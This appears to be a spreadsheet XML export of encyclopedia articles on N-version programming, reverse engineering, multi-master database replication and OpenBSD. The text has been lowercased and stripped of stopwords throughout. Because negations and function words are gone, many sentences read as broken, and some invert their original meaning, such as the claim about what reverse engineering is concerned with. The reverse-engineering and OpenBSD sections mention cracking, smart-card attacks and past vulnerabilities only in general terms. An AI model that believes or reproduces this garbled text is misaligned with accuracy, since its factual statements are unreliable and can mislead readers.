    <t>n-version programming (nvp), also known multiversion programming multiple-version dissimilar software, method process software engineering multiple functionally equivalent programs independently generated initial specifications. concept n-version programming introduced 1977 liming chen algirdas avizienis central conjecture "independence programming efforts greatly reduce probability identical software faults occurring versions program". improve reliability software operation building fault tolerance redundancy. approach general steps n-version programming are: initial specification intended functionality software developed. specification unambiguously define: functions, data formats (which include comparison vectors, c-vectors, comparison status indicators, cs-indicators), cross-check points (cc-points), comparison algorithm, responses comparison algorithm. from specifications, versions program independently developed, group interact others. implementations functionally equivalent programs different algorithms programming languages. various points program, special mechanisms built software allow program governed n-version execution environment (nvx). these special mechanisms include: comparison vectors (c-vectors, data structure representing program's state), comparison status indicators (cs-indicators), synchronization mechanisms. resulting programs called n-version software (nvs). some n-version execution environment (nvx) developed runs n-version software makes final decisions n-version programs whole given output individual n-version program. implementation decision algorithms vary ranging simple accepting frequently occurring output (for instance, majority versions agree output, likely correct) complex algorithm. criticisms researchers argued different programming teams make similar mistakes. 1986, knight leveson conducted experiment evaluate assumption independence nvp, found assumption independence failures n-version programs failed statistically. weakness program lies decision algorithm. question correctness program depends partially algorithm uses determine output "correct" given multitude outputs individual n-version program. theory, output multiple independent versions likely correct output single version. however, debate whether improvements n-version development enough warrant time, additional requirements, costs using method. “there considerable debate realizing full potential n-version programming makes assumption independence lead statistically independent mistakes. evidence shown premise faulty [12].” applications n-version programming applied software switching trains, performing flight control computations modern airliners, electronic voting (the save system), detection zero-day exploits, among uses. also redundancy (engineering) triple modular redundancy data redundancy fault tolerant design reliability engineering safety engineering references external links n-version programming rkbexplorer</t>
  </si>
  <si>
    <t>Reverse engineering</t>
  </si>
  <si>
    <t>reverse engineering (also known backwards engineering back engineering) process method attempts understand deductive reasoning previously made device, process, system, piece software accomplishes task little any) insight exactly essentially process opening dissecting system works, order duplicate enhance depending system consideration technologies employed, knowledge gained reverse engineering help repurposing obsolete objects, security analysis, learning something works.although process specific object performed reverse engineering processes consist three basic steps viz., information extraction, modeling review. information extraction refers practice gathering relevant information performing operation. modeling refers practice combining gathered information abstract model, used guide designing object system. review refers testing model ensure validity chosen abstract. reverse engineering applicable fields computer engineering, mechanical engineering, design, electronic engineering, software engineering, chemical engineering, systems biology. overview there many reasons performing reverse engineering various fields. reverse engineering origins analysis hardware commercial military advantage.: however, reverse engineering process, such, concerned creating copy changing artifact way. analysis deduce design features products little additional knowledge procedures involved original production.: cases, goal reverse engineering process simply redocumentation legacy systems.: even reverse-engineered product competitor, goal copy perform competitor analysis. reverse engineering also used create interoperable products despite narrowly-tailored united states european union legislation, legality using specific reverse engineering techniques purpose hotly contested courts worldwide decades.software reverse engineering help improve understanding underlying source code maintenance improvement software, relevant information extracted make decision software development graphical representations code provide alternate views regarding source code, help detect software vulnerability. frequently, software develops, design information improvements often lost time, lost information usually recovered reverse engineering. process also help time required understand source code, thus reducing overall cost software development. reverse engineering also help detect eliminate malicious code written software better code detectors. reversing source code used find alternate uses source code, detecting unauthorized replication source code intended used, revealing competitor's product built. that process commonly used "cracking" software media remove copy protection,: create possibly-improved copy even knockoff, usually goal competitor hacker.: malware developers often reverse engineering techniques find vulnerabilities operating system build computer virus exploit system vulnerabilities.: reverse engineering also used cryptanalysis find vulnerabilities substitution cipher, symmetric-key algorithm public-key cryptography.: there uses reverse engineering: interfacing. reverse engineering used system required interface another system systems would negotiate established. such requirements typically exist interoperability. military commercial espionage. learning enemy's competitor's latest research stealing capturing prototype dismantling result development similar product better countermeasure obsolescence. integrated circuits often designed proprietary systems built production lines, become obsolete years. when systems using parts longer maintained since parts longer made, incorporate functionality technology reverse-engineer existing chip redesign using newer tools using understanding gained guide. another obsolescence originated problem solved reverse engineering need support (maintenance supply continuous operation) existing legacy devices longer supported original equipment manufacturer. problem particularly critical military operations. product security analysis. that examines product works determining specifications components estimate costs identifies potential patent infringement. also part product security analysis acquiring sensitive data disassembling analyzing design system component. another intent remove copy protection circumvent access restrictions. competitive technical intelligence. that understand one's competitor actually doing, rather says doing. saving money. finding piece electronics spare user purchasing separate product. repurposing. obsolete objects reused different-but-useful manner. design. production design companies applied reverse engineering practical craft-based manufacturing process. companies work “historical” manufacturing collections scanning, re-modeling re-design. 2013 italian manufactures baldi savio firmino together university florence optimized innovation, design, production processes. common situations machines computer-aided design (cad) become popular, reverse engineering become viable method create virtual model existing physical part cad, cam, cae, software. reverse-engineering process involves measuring object reconstructing model. physical object measured using scanning technologies like cmms, laser scanners, structured light digitizers, industrial scanning (computed tomography). measured data alone, usually represented point cloud, lacks topological information design intent. former recovered converting point cloud triangular-faced mesh. reverse engineering aims beyond producing mesh recover design intent terms simple analytical surfaces appropriate (planes, cylinders, etc.) well possibly nurbs surfaces produce boundary-representation model. recovery model allows design modified meet requirements, manufacturing plan generated, etc. hybrid modeling commonly used term nurbs parametric modeling implemented together. using combination geometric freeform surfaces provide powerful method modeling. areas freeform data combined exact geometric surfaces create hybrid model. typical example would reverse engineering cylinder head, includes freeform cast features, water jackets high-tolerance machined areas.reverse engineering also used businesses bring existing physical geometry digital product development environments, make digital record products, assess competitors' products. used analyze product works, does, components has; estimate costs; identify potential patent infringement; etc. value engineering, related activity also used businesses, involves deconstructing analyzing products. however, objective find opportunities cost-cutting. reverse engineering reverse engineering printed circuit boards involves recreating fabrication data particular circuit board. this done allow benchmarking, support legacy systems. software 1990, institute electrical electronics engineers (ieee) defined (software) reverse engineering (sre) "the process analyzing subject system identify system's components interrelationships create representations system another form higher level abstraction" "subject system" product software development. reverse engineering process examination only, software system consideration modified, would otherwise re-engineering restructuring. reverse engineering performed stage product cycle, necessarily functional product.there components reverse engineering: redocumentation design recovery. redocumentation creation representation computer code easier understand. meanwhile, design recovery deduction reasoning general knowledge personal experience product understand product's functionality fully. also seen "going backwards development cycle." model, output implementation phase source code form) reverse-engineered back analysis phase, inversion traditional waterfall model. another term technique program comprehension. working conference reverse engineering (wcre) held yearly explore expand techniques reverse engineering. computer-aided software engineering (case) automated code generation contributed greatly field reverse engineering.software anti-tamper technology like obfuscation used deter reverse engineering re-engineering proprietary software software-powered systems. practice, main types reverse engineering emerge. first case, source code already available software, higher-level aspects program, perhaps poorly documented documented longer valid, discovered. second case, source code available software, efforts towards discovering possible source code software regarded reverse engineering. second usage term familiar people. reverse engineering software make clean room design technique avoid copyright infringement. related note, black testing software engineering common reverse engineering. tester usually goals find bugs undocumented features bashing product outside.other purposes reverse engineering include security auditing, removal copy protection ("cracking"), circumvention access restrictions often present consumer electronics, customization embedded systems (such engine management systems), in-house repairs retrofits, enabling additional features low-cost "crippled" hardware (such graphics card chip-sets), even mere satisfaction curiosity. binary software binary reverse engineering performed source code software unavailable. this process sometimes termed reverse code engineering, rce. example, decompilation binaries java platform accomplished using jad. famous case reverse engineering first non-ibm implementation bios, launched historic compatible industry overwhelmingly-dominant computer hardware platform many years. reverse engineering software protected fair exception copyright law. samba software, allows systems microsoft windows systems share files systems classic example software reverse engineering since samba project reverse-engineer unpublished information windows file sharing worked non-windows computers could emulate wine project thing windows api, openoffice.org party microsoft office file formats. reactos project even ambitious goals striving provide binary (abi api) compatibility current windows operating systems branch, allows software drivers written windows clean-room reverse-engineered free software (gpl) counterpart. windowsscope allows reverse-engineering full contents windows system's live memory including binary-level, graphical reverse engineering running processes. another classic, well-known, example 1987 bell laboratories reverse-engineered system 4.1, originally running apple macintosh could risc machines own. binary software techniques reverse engineering software accomplished various methods. three main groups software reverse engineering analysis observation information exchange, prevalent protocol reverse engineering, involves using analyzers packet sniffers, accessing computer computer network connection revealing traffic data thereon. network behavior analyzed produce standalone implementation mimics behavior. that especially useful reverse engineering device drivers. sometimes, reverse engineering embedded systems greatly assisted tools deliberately introduced manufacturer, jtag ports debugging means. microsoft windows, low-level debuggers softice popular. disassembly using disassembler, meaning machine language program read understood terms, machine-language mnemonics. works computer program take quite time, especially used machine code. interactive disassembler particularly popular tool. decompilation using decompiler, process tries, varying results, recreate source code high-level language program available machine code bytecode. software classification software classification process identifying similarities different software binaries (such different versions binary) used detect code relations software samples. task traditionally done manually several reasons (such patch analysis vulnerability detection copyright infringement), done somewhat automatically large numbers samples. this method used mostly long thorough reverse engineering tasks (complete analysis complex algorithm piece software). general, statistical classification considered hard problem, also true software classification, solutions/tools handle task well. source code number tools refer process importing analysing source code generate diagrams "reverse engineering." list tools. although approach providing "reverse engineering" recent advances international standards activities resulted development knowledge discovery metamodel (kdm). standard delivers ontology intermediate abstracted) representation programming language constructs interrelationships. object management group standard becoming standard well), started take hold industry development tools analysis environments deliver extraction analysis source, binary, byte code. source code analysis, kdm's granular standards' architecture enables extraction software system flows (data, control, call maps), architectures, business layer knowledge (rules, terms, process). standard enables common data format (xmi) enabling correlation various layers system knowledge either detailed analysis (such root cause, impact) derived analysis (such business process extraction). although efforts represent language constructs never-ending number languages, continuous evolution software languages, development languages, standard allow extensions support broad language well evolution. compatible uml, bpmn, rdf, standards enabling migration environments thus leverage system knowledge efforts software system transformation enterprise business layer analysis. protocols protocols sets rules describe message formats messages exchanged: protocol state machine. accordingly, problem protocol reverse-engineering partitioned subproblems: message format state-machine reverse-engineering. message formats traditionally reverse-engineered tedious manual process, involved analysis protocol implementations process messages, recent research proposed number automatic solutions. typically, automatic approaches group observe messages clusters using various clustering analyses, emulate protocol implementation tracing message processing. there less work reverse-engineering state-machines protocols. general, protocol state-machines learned either process offline learning, passively observes communication attempts build general state-machine accepting observed sequences messages, online learning, allows interactive generation probing sequences messages listening responses probing sequences. general, offline learning small state-machines known np-complete, online learning done polynomial time. automatic offline approach demonstrated comparetti online approach al.other components typical protocols, like encryption hash functions, reverse-engineered automatically well. typically, automatic approaches trace execution protocol implementations detect buffers memory holding unencrypted packets. integrated circuits/smart cards reverse engineering invasive destructive form analyzing smart card. attacker uses chemicals etch away layer layer smart card takes pictures scanning electron microscope (sem). that technique reveal complete hardware software part smart card. major problem attacker bring everything right order find everything works. makers card hide keys operations mixing memory positions, scrambling.in cases, even possible attach probe measure voltages smart card still operational. makers card employ sensors detect prevent attack. that attack common requires large investment effort special equipment generally available large chip manufacturers. furthermore, payoff attack since security techniques often used shadow accounts. still uncertain whether attacks chip-and-pin cards replicate encryption data crack pins would provide cost-effective attack multifactor authentication. full reverse engineering proceeds several major steps. first step images taken stitching images together, necessary layer cannot captured single shot. needs sweep across area circuit take several hundred images cover entire layer. image stitching takes input several hundred pictures outputs single properly-overlapped picture complete layer. next, stitched layers need aligned sample, etching, cannot exact position relative time. therefore, stitched versions overlap correct fashion, real circuit. usually, three corresponding points selected, transformation applied basis that. extract circuit structure, aligned, stitched images need segmented, highlights important circuitry separates uninteresting background insulating materials. finally, wires traced layer next, netlist circuit, contains circuit's information, reconstructed. military applications reverse engineering often used people copy nations' technologies, devices, information obtained regular troops fields intelligence operations. often used second world cold war. here well-known examples second world later: jerry can: british american forces noticed germans gasoline cans excellent design. they reverse-engineered copies cans, cans popularly known "jerry cans." panzerschreck: germans captured american bazooka second world reverse engineered create larger panzerschreck. tupolev tu-4: 1944, three american b-29 bombers missions japan forced land soviet union. soviets, similar strategic bomber, decided copy b-29. within three years, developed tu-4, nearly-perfect copy. scr-584 radar: copied soviet union second world war, known modifications сцр-584, бинокль-д. rocket: technical documents related technologies captured western allies war. americans focused reverse engineering efforts operation paperclip, development pgm-11 redstone rocket. soviets used captured german engineers reproduce technical documents plans worked captured hardware make clone rocket, r-1. thus began postwar soviet rocket program, beginning space race. k-13/r-3s missile (nato reporting name aa-2 atoll), soviet reverse-engineered copy aim-9 sidewinder, made possible taiwanese (rocaf) aim-9b chinese mig-17 without exploding september 1958. missile became lodged within airframe, pilot returned base soviet scientists would describe university course missile development. bgm-71 missile: 1975, negotiations iran hughes missile systems co-production maverick missiles stalled disagreements pricing structure, subsequent 1979 revolution ending plans co-production. iran later successful reverse-engineering missile produces copy, toophan. china reversed engineered many examples western russian hardware, fighter aircraft missiles hmmwv cars, mig-15,17,19,21 (which became j-2,5,6,7) su-33 (which became j-15). more recent analyses china's military growth pointed inherent limitations habitual reverse engineering advanced weapon systems. during second world war, polish british cryptographers studied captured german "enigma" message encryption machines weaknesses. their operation simulated electromechanical devices, "bombes", tried possible scrambler settings "enigma" machines helped breaking coded messages sent germans. also second world war, british scientists analyzed defeated series increasingly-sophisticated radio navigation systems used luftwaffe perform guided bombing missions night. british countermeasures system effective cases, german aircraft signals land bases since believed returned german territory. gene networks reverse engineering concepts applied biology well, specifically task understanding structure function gene regulatory networks. they regulate almost every aspect biological behavior allow cells carry physiological processes responses perturbations. understanding structure dynamic behavior gene networks therefore paramount challenges systems biology, immediate practical repercussions several applications beyond basic research. there several methods reverse engineering gene regulatory networks using molecular biology data science methods. they generally divided classes: coexpression methods based notion genes exhibit similar expression profile, related although causation simply inferred coexpression. sequence motif methods analyze gene promoters find specific transcription factor binding domains. transcription factor predicted bind promoter specific gene, regulatory connection hypothesized. chromatin immunoprecipitation (chip) methods investigate genome-wide profile binding chosen transcription factors infer downstream gene networks. orthology methods transfer gene network knowledge species another. literature methods implement text mining manual research identify putative experimentally-proven gene network connections. transcriptional complexes methods leverage information protein-protein interactions transcription factors, thus extending concept gene networks include transcriptional regulatory complexes.often, gene network reliability tested genetic perturbation experiments followed dynamic modelling, based principle removing network node predictable effects functioning remaining nodes network. applications reverse engineering gene networks range understanding mechanisms plant physiology highlighting targets anticancer therapy. overlap patent reverse engineering applies primarily gaining understanding process artifact manner construction, use, internal processes made clear creator. patented items reverse-engineered studied, essence patent inventors provide detailed public disclosure themselves, return receive legal protection invention involved. however, item produced patents could also include technology patented disclosed. indeed, common motivation reverse engineering determine whether competitor's product contains patent infringement copyright infringement. legality united states united states, even artifact process protected trade secrets, reverse-engineering artifact process often lawful legitimately obtained.reverse engineering computer software often falls contract breach contract well relevant laws. that end-user license agreements specifically prohibit courts ruled terms present, override copyright expressly permits (see bowers baystate technologies). according section 103(f) digital millennium copyright u.s.c. 1201 (f)), person legal possession program reverse-engineer circumvent protection necessary achieve "interoperability," term broadly covers devices programs interact make transfer data useful ways. limited exemption exists allows knowledge thus gained shared used interoperability purposes. european union directive 2009/24 legal protection computer programs, superseded earlier (1991) directive, governs reverse engineering european union. also references sources</t>
  </si>
  <si>
    <t>Multi-master replication</t>
  </si>
  <si>
    <t>multi-master replication method database replication allows data stored group computers, updated member group. members responsive client data queries. multi-master replication system responsible propagating data modifications made member rest group resolving conflicts might arise concurrent changes made different members. multi-master replication contrasted primary-replica replication, single member group designated "master" given piece data node allowed modify data item. other members wishing modify data item must first contact master node. allowing single master makes easier achieve consistency among members group, less flexible multi-master replication. multi-master replication also contrasted failover clustering passive replica servers replicating master data order prepare takeover event master stops functioning. master server active client interaction. often, communication replication multi-master systems handled type consensus algorithm, also implemented custom proprietary algorithms specific software. primary purposes multi-master replication increased availability faster server response time. advantages availability: master fails, masters continue update database. distributed access: masters located several physical sites, i.e. distributed across network. disadvantages consistency: most multi-master replication systems loosely consistent, i.e. lazy asynchronous, violating acid properties. performance: eager replication systems complex increase communication latency. integrity: issues conflict resolution become intractable number nodes involved rises latency increases. implementations directory services many directory servers based lightweight directory access protocol (ldap) implement multi-master replication. active directory prevalent multi-master replication implementations directory servers microsoft's active directory. within active directory, objects updated domain controller replicated domain controllers multi-master replication. required domain controllers replicate would cause excessive network traffic large active directory deployments. instead, domain controllers complex update pattern ensures servers updated timely fashion without excessive replication traffic. some active directory needs however better served flexible single master operation. directory directory supports multi-master replication. opends/opendj opends (and successor product opendj) implemented multi-master since version 1.0. opends/opendj multi-master replication asynchronous, uses publish-subscribe mechanism allows scaling large number nodes. opends/opendj replication conflict resolution entry attribute level. opends/opendj replication used wide area network. openldap openldap, widely used open-source ldap server, implements multi-master replication since version (october 2007) [1]. database management systems amazon aurora amazon aurora composed writer nodes, replicate redo records, storage nodes. writer node sends change storage node, checks conflicts reports confirmation rejection change. apache couchdb apache couchdb uses simple, http-based multi-master replication system built append-only data-store multiversion concurrency control (mvcc). each document contains revision every record stores evolutionary timeline previous revision leading itself—which provides foundation couchdb's mvcc system. additionally, keeps by-sequence index entire database. "the replication process copies last revision document, previous revisions source database copied destination database."the couchdb replicator acts simple http client acting source target database. compares current sequence database, calculates revision differences, makes necessary changes target based found history source database. bi-directional replication result merely another replication source target values swapped. arangodb arangodb native multi-model database system using multi-master replication. clusters arangodb master/master model single point failure. when cluster encounters network partition, arangodb prefers maintain internal consistency availability. clients experience view database regardless node connect and, cluster continues serve requests even machine fails. cloudant cloudant, distributed database system, uses largely http apache couchdb, exposes ability replicate using multiversion concurrency control (mvcc). cloudant databases replicate other, internally, nodes within cloudant clusters multi-master replication stay sync provide high availability consumers. extremedb cluster extremedb cluster clustering sub-system mcobject's extremedb embedded database product family. maintains database consistency across multiple hardware nodes replicating transactions synchronous manner (two-phase commit). important characteristic extremedb cluster transaction replication, contrast file-based, statement-based, replication schemes guarantee success failure entire transactions. accordingly, extremedb cluster acid compliant system (not base eventual consistency); query executed cluster node return result executed cluster node. oracle database clusters implement multi-master replication using methods. asynchronous multi-master replication commits data changes deferred transaction queue periodically processed databases cluster. synchronous multi-master replication uses oracle's two-phase commit functionality ensure databases cluster consistent dataset. microsoft microsoft provides multi-master replication peer-to-peer replication. provides scale-out high-availability solution maintaining copies data across multiple nodes. built foundation transactional replication, peer-to-peer replication propagates transactionally consistent changes near real-time. mysql mariadb basic level, possible achieve multi-master replication scheme beginning mysql version 3.23 circular replication. departing that, mariadb mysql ship replication support, different nuances. terms direct support have: mariadb: natively supports multi-master replication since version 10.0, conflict resolution supported, master must contain different databases. mysql, named multi-source available since version 5.7.6. mysql: mysql group replication, plugin virtual synchronous multi-master conflict handling distributed recovery released 5.7.17. cluster projects: mysql cluster supports conflict detection resolution multiple masters since version true multi-master capability mysql server. there also external project, galera cluster created codership, provides true multi-master capability, based fork innodb storage engine custom replication plug-ins. replication synchronous, conflict possible. percona xtradb cluster also combination galera replication library mysql supporting multi-master. postgresql various options synchronous multi-master replication exist. postgres-xl available mozilla public license, postgresxc (now known postgres-x2) available license postgresql examples. note pgcluster (archived 2017-07-05 wayback machine) project abandoned 2007. replication documentation postgresql categorises different types replication available. various options exist distributed multi-master, including bucardo, rubyrep bi-directional replication. postgresql aimed eventual inclusion postgresql core benchmarked demonstrating significantly enhanced performance earlier options. includes replication data writes (dml), well changes data definition (ddl) global sequences. nodes upgraded online version onwards. 2ndquadrant developed continuously since 2012, system used production since 2014. latest version provides column-level conflict detection, crdts, eager replication, multi-node query consistency, many features. ingres within ingres replicator, objects updated ingres server replicated servers whether local remote multi-master replication. server fails, client connections re-directed another server. required ingres servers environment replicate could cause excessive network traffic large implementations. instead, ingres replicator allows appropriate data replicated appropriate servers without excessive replication traffic. this means servers environment serve failover candidates servers meet requirements managing subset columns tables departmental solution, subset rows geographical region one-way replication reporting server. event source, target, network failure, data integrity enforced two-phase commit protocol ensuring either whole transaction replicated, none addition, ingres replicator operate rdbms’s multiple vendors connect them. also flexible single master operation active directory distributed database management system zone transfer optimistic replication references external links active directory replication model terms definitions database replication symmetricds database independent, data synchronization software. uses database technologies replicate tables relational databases near real time. software designed scale large number databases, work across low-bandwidth connections, withstand periods network outage. supports mysql, oracle, server, postgresql, db2, firebird, interbase, hsqldb, apache derby, informix, greenplum, sqlite, sybase ase, sybase asa. licensed open source (gpl) commercial licenses. daffodil replicator java tool data synchronization, data migration, data backup various database servers. daffodil replicator works standard jdbc driver supports replication across heterogeneous databases. present, supports following databases: microsoft server, oracle, daffodil database, db2, apache derby, mysql, postgresql. daffodil replicator available enterprise (commercial) open source (gpl-licensed) versions. dmoz open directory project database replication page</t>
  </si>
  <si>
    <t>OpenBSD</t>
  </si>
  <si>
    <t>openbsd security-focused, free open-source, unix-like operating system based berkeley software distribution (bsd). theo raadt created openbsd 1995 forking netbsd 1.0. according website, openbsd project emphasizes "portability, standardization, correctness, proactive security integrated cryptography."the openbsd project maintains portable versions many subsystems packages operating systems. because project's preferred license, many components reused proprietary corporate-sponsored software projects. firewall code apple's macos based openbsd's firewall code, android's bionic standard library based openbsd code, llvm uses openbsd's regular expression library, windows uses openssh (openbsd secure shell) libressl.the word "open" name openbsd refers availability operating system source code internet, although word "open" name openssh means "openbsd". also refers wide range hardware platforms system supports. history december 1994, theo raadt, founding member netbsd project, asked resign netbsd core team disagreements conflicts members netbsd team. october 1995, raadt founded openbsd, project forked netbsd 1.0. initial release, openbsd 1.2, made july 1996, followed openbsd october year. since then, project issued release every months, supported year. july 2007, openbsd developer beck announced formation openbsd foundation, canadian non-profit organization formed "act single point contact persons organizations requiring legal entity deal wish support openbsd." usage statistics hard determine widely openbsd used, developers publish collect usage statistics. september 2005, certification group surveyed 4330 individual users, showing 32.8% used openbsd, behind freebsd 77%, ahead netbsd 16.3% dragonfly 2.6%. however, authors survey clarified neither "exhaustive" "completely accurate", since survey spread mainly mailing lists, forums word mouth. this combined factors, like lack control group, pre-screening process significant outreach outside community, makes survey unreliable judging usage globally. uses network appliances openbsd features robust tcp/ip networking stack, used router wireless access point. openbsd's security enhancements, built-in cryptography, packet filter make suitable security purposes firewalls, intrusion-detection systems, gateways. several proprietary systems based openbsd, including devices armorlogic (profense application firewall), calyptix security, genua, rtmx, .vantronix. foreign operating systems some versions microsoft's services unix, extension windows operating system provide unix-like functionality, much openbsd code base included interix interoperability suite, developed softway systems inc., microsoft acquired 1999. core force, security product windows, based openbsd's firewall. firewall also found operating systems: including freebsd, macos. personal computers openbsd ships xenocara, implementation window system, suitable desktop operating system personal computers, including laptops.: september 2018, openbsd includes approximately 8000 packages software repository, including desktop environments gnome, plasma xfce, browsers firefox chromium. project also includes three window managers main distribution: cwm, fvwm (part default configuration xenocara), twm. servers openbsd features full server suite configured mail server, server, server, server, router, firewall, file server, combination these. since version 6.8, openbsd also shipped native in-kernel wireguard support. security shortly openbsd created, raadt contacted local security software company named secure networks (later acquired mcafee). they developing network security auditing tool called ballista, intended find exploit software security flaws. this coincided raadt's interest security, cooperated leading release openbsd 2.3. this collaboration helped define security focus openbsd project.openbsd includes numerous features designed improve security, secure alternatives posix functions standard library, strlcat strcat strlcpy strcpy toolchain alterations, including static bounds checker memory protection techniques guard invalid accesses, propolice page protection feature strong cryptography randomization system call filesystem access restrictions limit process capabilitiesto reduce risk vulnerability misconfiguration allowing privilege escalation, many programs written adapted make privilege separation, privilege revocation chrooting. privilege separation technique, pioneered openbsd inspired principle least privilege, program split parts, performs privileged operations other—almost always bulk code—runs without privilege. privilege revocation similar involves program performing necessary operations privileges starts dropping them. chrooting involves restricting application section file system, prohibiting accessing areas contain private system files. developers applied enhancements openbsd versions many common applications, tcpdump, file, tmux, smtpd, syslogd.openbsd developers instrumental creation development openssh (aka openbsd secure shell), developed openbsd repositories. openbsd secure shell based original ssh. first appeared openbsd popular client server, available many operating systems.the project policy continually auditing source code problems, work developer marc espie described "never finished question process specific hunted." went list several typical steps found, including examining entire source tree similar issues, "try[ing] find whether documentation ought amended", investigating whether "it's possible augment compiler warn specific problem." security record openbsd website features prominent reference system's security record. until june 2002, read: five years without remote hole default install! june 2002, mark dowd internet security systems disclosed openssh code implementing challenge–response authentication. this vulnerability openbsd default installation allowed attacker remote access root account, extremely serious openbsd, also large number operating systems using openssh time. this problem necessitated adjustment slogan openbsd website remote hole default install, nearly years! quote remained unchanged time passed, march 2007, alfredo ortega core security technologies disclosed network-related remote vulnerability. quote subsequently changed only remote holes default install, heck long time! this statement criticized default install contains running services, many cases require additional services. also, ports tree contains unaudited third-party software, easy users compromise security installing improperly configuring packages. however, project maintains slogan intended refer default install correct measure. fundamental ideas behind openbsd drive systems simple, clean, secure default. default install quite minimal, project states ensure novice users need become security experts overnight", fits open-source code auditing practices considered important elements security system. alleged backdoor december 2010, gregory perry, former technical consultant federal bureau investigation (fbi), emailed raadt alleging paid openbsd ex-developers years prior insert backdoors openbsd cryptographic framework. raadt made email public december forwarding openbsd-tech mailing list suggested audit ipsec codebase. raadt's response skeptical report invited developers independently review relevant code. weeks followed, bugs fixed evidence backdoors found. raadt stated believe netsec probably contracted write backdoors alleged. written, believe made tree. they might deployed product." criticisms december 2017, ilja sprundel, director ioactive, gave talk well con, entitled "are bsds created equally? survey kernel vulnerabilities", stated although openbsd clear winner bsds terms security, "bugs still easy find kernels, even openbsd". years later, 2019, talk named systematic evaluation openbsd's mitigations" given ccc, arguing openbsd effective mitigations, significant part "useless best based pure luck superstition", arguing rational approach comes designing them. hardware compatibility supported platforms devices listed openbsd supported platforms notes. other configurations also work, simply tested documented yet. rough automatically extracted lists supported device available third party repository. subprojects many open source projects started components openbsd, including: some subsystems integrated operating systems, many available packages unix-like systems.linux administrator carlos fenollosa commented moving linux openbsd system faithful unix philosophy small, simple tools work together well: "some base components feature-rich, purpose. since servers need flexibility apache, openbsd's httpd work fine, secure, probably faster". characterized developer community's attitude components "when community decides module sucks, develop scratch. openbsd ntpd, smtpd and, recently, httpd. they work great". result, openbsd relatively prolific creating components become widely reused systems. openbsd runs nearly standard daemons within chroot privsep security structures default, part hardening base system.the calgary internet exchange formed 2012, part serve needs openbsd project.in 2017, isotop, french project aiming adapt openbsd desktops laptops, using xfce dwm, started developed. third-party components openbsd includes number third-party components, many openbsd-specific patches, x.org, clang (the default compiler several architectures), gcc, perl, nsd, unbound, ncurses, binutils, gdb, awk. development development continuous, team management open tiered. anyone appropriate skills contribute, commit rights awarded merit raadt acting coordinator.: xxxv official releases made year, version number incremented 0.1, supported twelve months (two release cycles). snapshot releases also available frequent intervals. maintenance patches supported releases applied using syspatch, manually updating system patch branch source repository release. alternatively, system administrator upgrade next snapshot release using sysupgrade, using -current branch repository, order gain pre-release access recently added features. sysupgrade tool also upgrade latest stable release version. generic openbsd kernel provided default strongly recommended users, contrast operating systems recommend user kernel customization.packages outside base system maintained ports tree responsibility individual maintainers, known porters. well keeping current branch date, porters expected apply appropriate bug-fixes maintenance fixes branches package openbsd's supported releases. ports generally subject continuous auditing base system lack manpower. binary packages built centrally ports tree architecture. this process applied current version, supported release, snapshot. administrators recommended package mechanism rather build package ports tree, unless need perform source changes. openbsd's developers regularly meet special events called hackathons, "sit code", emphasizing productivity.most releases include song. open source open documentation openbsd known high-quality documentation.when openbsd created, raadt decided source code available anyone read. time, small team developers generally access project's source code. chuck cranor raadt concluded practice "counter open source philosophy" inconvenient potential contributors. together, cranor raadt first public, anonymous revision control system server. raadt's decision allowed users "take active role", established project's commitment open access. openbsd notable continued (more precisely unreleased, openbsd-managed fork named opencvs), projects used migrated systems.openbsd include closed source binary drivers source tree, include code requiring signing non-disclosure agreements.since openbsd based canada, united states export restrictions cryptography apply, allowing distribution make full modern algorithms encryption. example, swap space divided small sections section encrypted key, ensuring sensitive data leak insecure part system.openbsd randomizes various behaviors applications, making less predictable thus difficult attack. example, pids created associated randomly processes; bind system call uses random port numbers; files created random inode numbers; datagrams random identifiers. this approach also helps expose bugs kernel user space programs. openbsd policy openness extends hardware documentation: slides december 2006 presentation, raadt explained without "developers often make mistakes writing drivers", pointed "the god, work] rush harder achieve, developers give up." went vendor-supplied binary drivers unacceptable inclusion openbsd, trust vendor binaries running kernel" [them] break." licensing openbsd maintains strict license policy, preferring license variants license. project attempts "maintain spirit original berkeley unix copyrights," permitted "relatively un-encumbered unix source distribution." widely used apache license general public license considered overly restrictive.in june 2001, triggered concerns darren reed's modification ipfilter's license wording, systematic license audit openbsd ports source trees undertaken. code hundred files throughout system found unlicensed, ambiguously licensed terms license. ensure licenses properly adhered attempt made contact relevant copyright holders: pieces code removed, many replaced, others, multicast routing tools mrinfo map-mbone, relicensed openbsd could continue them. also removed audit software produced daniel bernstein. time, bernstein requested modified versions code approved prior redistribution, requirement openbsd developers unwilling devote time effort.because licensing concerns, openbsd team reimplemented software scratch adopted suitable existing software. example, openbsd developers created packet filter unacceptable restrictions imposed ipfilter. first appeared openbsd available many operating systems. openbsd developers also replaced gpl-licensed tools (such pkg-config) permissively licensed equivalents. funding although operating system portable components used commercial products, raadt says little funding project comes industry: "traditionally funding come user donations users buying (our products really make much money). obviously, money."for two-year period early 2000s, project received funding darpa, "paid salaries people work completely full-time, bought $30k hardware, paid hackathons", posse project.in 2006, openbsd project experienced financial difficulties. mozilla foundation godaddy among organizations helped openbsd survive. however, raadt expressed concern asymmetry funding: think contributions come first vendors, secondly corporate users, thirdly individual users. response almost entirely opposite, almost 15-to-1 dollar ratio favor little people. thanks lot, little people!"on january 2014, beck issued request funding cover electrical costs. sustainable funding found, beck suggested openbsd project would shut down. project soon received us$20,000 donation mircea popescu, romanian creator mpex bitcoin stock exchange, paid bitcoins. project raised us$150,000 response appeal, enabling bills securing short-term future. openbsd foundation openbsd foundation canadian federal non-profit organization founded openbsd project "single point contact persons organizations requiring legal entity deal wish support openbsd." announced public openbsd developer beck july 2007. also serves legal safeguard projects affiliated openbsd, including openssh, openbgpd, openntpd, opencvs, opensmtpd libressl.since 2014, several large contributions openbsd foundation come corporations microsoft, facebook, google well core infrastructure initiative.in 2015, microsoft became foundation's first gold level contributor donating $25,000-50,000 support development openssh, integrated powershell july, later windows server 2018. other contributors include google, facebook duckduckgo.during 2016 2017 fundraising campaigns, smartisan, chinese company, leading financial contributor openbsd foundation. distribution openbsd freely available various ways: source retrieved anonymous cvs, binary releases development snapshots downloaded ftp, http, rsync. prepackaged cd-rom sets version ordered online small fee, complete assortment stickers copy release's theme song. these, artwork bonuses, project's sources income, funding hardware, internet service, expenses. beginning version 6.1, cd-rom sets longer released. openbsd provides package management system easy installation management programs part base operating system. packages binary files extracted, managed removed using package tools. openbsd, source packages ports system, collection makefiles infrastructure required create packages. openbsd, ports base operating system developed released together version: means ports packages released with, example, suitable vice versa. songs artwork initially, openbsd used haloed version daemon mascot drawn erick green, asked raadt create logo versions openbsd. green planned create full 